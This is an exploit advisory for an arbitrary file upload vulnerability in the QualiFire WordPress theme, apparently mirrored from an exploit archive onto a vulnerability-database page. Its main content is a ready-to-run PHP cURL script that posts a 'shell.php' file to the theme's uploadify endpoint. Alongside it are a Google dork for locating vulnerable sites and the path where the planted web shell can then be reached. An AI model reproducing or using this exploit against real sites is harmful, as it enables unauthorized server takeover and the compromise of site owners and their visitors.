#######################################################################
Exploit Title: Wordpress Themes QualiFire File Upload Vulnerability
Google Dork: inurl:wp-content/themes/qualifire
Date: 30/06/2012
Author: Tn_Scorpion
Software Link: http://themeforest.net/item/qualifire-wordpress-theme/105879 ( it's not free 40$ )
#######################################################################
[+] exploit
<?php
$uploadfile="shell.php";
$ch = curl_init("http://example.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/wp-content/themes/qualifire/scripts/admin/uploadify/
#######################################################################
Gr33rz to : Tunisian spl01t3r , Maxim Tatto , KillerMind , Hacker-1420 , Anas Laribi , H3rcule-32 , dOctor.Virus ,
KinG Of Controle , King Of Pirates , Ked Ans ....... & All Muslim Hackers
Profile : www.facebook.com/Viva.Hackers
# 0day.today [2018-03-13] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation